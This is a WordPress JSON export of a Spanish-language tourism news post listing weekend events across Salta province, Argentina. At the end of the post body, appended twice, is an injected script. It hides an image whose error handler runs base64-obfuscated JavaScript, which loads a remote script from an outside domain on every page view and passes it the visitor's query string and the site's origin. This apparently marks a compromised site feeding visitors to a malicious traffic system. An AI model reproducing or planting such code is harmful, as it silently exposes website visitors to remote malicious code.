{"id":3524,"date":"2024-01-12T09:00:57","date_gmt":"2024-01-12T12:00:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3524"},"modified":"2025-08-14T00:02:19","modified_gmt":"2025-08-14T03:02:19","slug":"salta-te-invita-a-disfrutar-de-una-gran-variedad-de-experiencias-turisticas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3524","title":{"rendered":"Salta te invita a disfrutar de una gran variedad de experiencias tur\u00edsticas"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-914e2e6e223e8c1e0475f499759f0c28\" style=\"background-color:#870e2c\"><strong><em>Este fin de semana el turista podr\u00e1 vivir diversas experiencias en las siete regiones tur\u00edsticas de la provincia, entre las que se destacan la Fiesta de la Arveja y la Baguala en Payogasta, el inicio de los Corsos de Flores en Cerrillos y la recepci\u00f3n del Primer Turista en La Vi\u00f1a y Campo Quijano.<\/em><\/strong><\/h5>\n\n\n\n<p>El Ministerio de Turismo y Deportes cuenta con un completo programa de actividades, organizadas por el sector privado y por los gobiernos municipales, para que salte\u00f1os y visitantes puedan disfrutar de una gran variedad de experiencias tur\u00edsticas a lo largo y ancho de las siete regiones tur\u00edsticas de la provincia. El calendario completo se puede consultar en\u00a0<a href=\"http:\/\/www.visitsalta.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/www.visitsalta.ar<\/a>\u00a0o en\u00a0<a href=\"http:\/\/www.saltacalendario.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/www.saltacalendario.gob.ar<\/a><\/p>\n\n\n\n<p>A continuaci\u00f3n las actividades que se realizar\u00e1n en los distintos municipios el domingo 14 de enero. Los horarios se pueden consultar en los centros de visitantes de cada lugar.<\/p>\n\n\n\n<p>La Ciudad de Salta ofrece, todos los d\u00edas, en el Museo Hist\u00f3rico del Norte la actividad Trivia Hist\u00f3rica en el Cabildo \u00bfCu\u00e1nto sabes sobre historia? y una kerm\u00e9s con un espacio permanente con juegos grupales e individuales para disfrutar en familia.<\/p>\n\n\n\n<p>A 10 kil\u00f3metros de la ciudad de Salta, en San Lorenzo se puede disfrutar de diversas actividades,&nbsp; s\u00e1bado desde las 16 hs. y los domingo desde las 9 hs. se puede realizar un Mini Trekking guiado por la Reserva Las Yungas, esta actividad requiere inscripci\u00f3n previa; en tanto en la Quebrada ma\u00f1ana&nbsp;s\u00e1bado 13 desde las 16 hs. se llevar\u00e1 adelante un taller de danzas folcl\u00f3ricas y hoy&nbsp;viernes 12 se podr\u00e1 participar de un recorrido de reconocimiento de \u00e1rboles nativos, la cita es a las 11 hs.<\/p>\n\n\n\n<p>Asimismo, hoy&nbsp;viernes 12 los visitantes tendr\u00e1n la oportunidad de disfrutar desde las 21 horas&nbsp;de m\u00fasica en vivo en la Costanera con la presencia del saxofonista Esteban Montero. Adem\u00e1s, ma\u00f1ana&nbsp;s\u00e1bado 13 habr\u00e1 un taller de iniciaci\u00f3n al senderismo en Reserva Las Yungas y una pe\u00f1a folcl\u00f3rica en el Restaurante Lo del Boya. Ese mismo d\u00eda y el domingo 14 se realizar\u00e1 la feria gastron\u00f3mica el Zorzal en la plaza Ej\u00e9rcito Argentino desde las 10 horas.<\/p>\n\n\n\n<p>Hasta el domingo, en San Antonio de los Cobres se podr\u00e1 realizar una caminata guiada por el pueblo para conocer sus atractivos y recorrer el Mercado Artesanal. En tanto, los mismos d\u00edas en el municipio de La Caldera se puede disfrutar de la pileta en su complejo deportivo municipal desde las 14 horas.<\/p>\n\n\n\n<p>Por su parte, en El Carril hasta ma\u00f1ana&nbsp;s\u00e1bado desde las 19 horas&nbsp;se desarrollar\u00e1 la semana de la empanada y el domingo 14 desde las 11 hs. ser\u00e1 el Concurso del Turr\u00f3n Salte\u00f1o.<\/p>\n\n\n\n<p>En la localidad de Met\u00e1n, salte\u00f1os y turistas podr\u00e1n disfrutar hoy&nbsp;viernes 12 de noches de encuentros en el Balneario Camping Municipal, ma\u00f1ana&nbsp;s\u00e1bado 13 de caminatas diurnas a Balderrama saliendo desde Plazoleta G\u00fcemes y de encuentros de viveros y artesanos en el Paseo de la Estaci\u00f3n; en tanto el domingo 14 desde la 21 hs. ser\u00e1 el Pre Festimiel.<\/p>\n\n\n\n<p>Por otro lado, ma\u00f1ana&nbsp;s\u00e1bado 13 se har\u00e1 la Feria Municipal y de Emprendedores en la localidad de Vaqueros; la Fiesta de la Arveja y la Baguala con exposici\u00f3n y venta de productos en el Paraje Piul del municipio de Payogasta; y la recepci\u00f3n del primer turista a las 15 hs. en el Camping Municipal de La Vi\u00f1a.<\/p>\n\n\n\n<p>Ese mismo d\u00eda adem\u00e1s en Aguaray, desde las 17 hs., se realizar\u00e1n salidas guiadas al sendero Guadalupe de la comunidad de Capiazuti; en Cerrillos iniciar\u00e1n los tradicionales Corsos de Flores; y en Secl\u00e1ntas se har\u00e1 la Feria de Barracan y algo m\u00e1s con concurso de hilado y artistas en vivo.<\/p>\n\n\n\n<p>En tanto en la localidad de Or\u00e1n ma\u00f1ana&nbsp;s\u00e1bado 13 y el domingo 14 se llevar\u00e1 adelante un Encuentro Gastron\u00f3mico Chaco Sudamericano desde las 22 hs.; y el domingo en Campo Quijano ser\u00e1 la recepci\u00f3n del primer turista.<\/p>\n\n\n\n<p>Por su parte Cachi propone diferentes actividades para disfrutar hasta el&nbsp;domingo 14. Desde las 8 se pueden realizar visitas al taller municipal de artesan\u00edas, desde las 9 se desarrollar\u00e1 la actividad Turismo Rural Comunitario El Toste visitando familias productoras y artesanas, y Turismo Con Identidad recorriendo distintos sitios arqueol\u00f3gicos; adem\u00e1s en la Casa de la Cultura habr\u00e1 juegos de mesa, y muestra fotogr\u00e1fica y sonora.<\/p>\n\n\n\n<p>Tambi\u00e9n en la localidad de los Valles Calchaqu\u00edes habr\u00e1 un patio de juegos en el Museo Arqueol\u00f3gico; se realizar\u00e1n recorridos guiados por los Sitios Arqueol\u00f3gicos El Tero y Las Pailas; exposici\u00f3n y venta de artesan\u00edas del taller de cer\u00e1mica municipal en la Plaza Principal; y distintos talleres de recursos teatrales, sensibilizaci\u00f3n a trav\u00e9s de t\u00e9cnicas art\u00edsticas y de uso de los recursos naturales.<\/p>\n\n\n\n<p>Estas son solo algunas de las variadas actividades que salte\u00f1os y turistas podr\u00e1n vivir durante el verano 2024 que se suman a la oferta de aventura, naturaleza y gastron\u00f3mica que incluyen disfrutar a Salta desde el aire en globo aerost\u00e1tico, un rafting en el ca\u00f1\u00f3n del r\u00edo Juramento, actividades n\u00e1uticas en el dique Cabra Corral, de unas empanadas y de un vino de altura.<\/p>\n\n\n\n<p>El calendario completo se puede consultar en&nbsp;<a href=\"http:\/\/www.visitsalta.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/www.visitsalta.ar<\/a>&nbsp;o en&nbsp;<a href=\"http:\/\/www.saltacalendario.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/www.saltacalendario.gob.ar<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-te-invita-a-disfrutar-de-una-gran-variedad-de-experiencias-turisticas-93742\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este fin de semana el turista podr\u00e1 vivir diversas experiencias en las siete regiones tur\u00edsticas de la provincia, entre las que se destacan la Fiesta de la Arveja y la Baguala en Payogasta, el inicio de los Corsos de Flores en Cerrillos y la recepci\u00f3n del Primer Turista en La Vi\u00f1a y Campo Quijano. El [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3525,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,18],"tags":[],"class_list":{"0":"post-3524","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3524"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3524"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3524\/revisions"}],"predecessor-version":[{"id":6876,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3524\/revisions\/6876"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3525"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3524"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3524"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}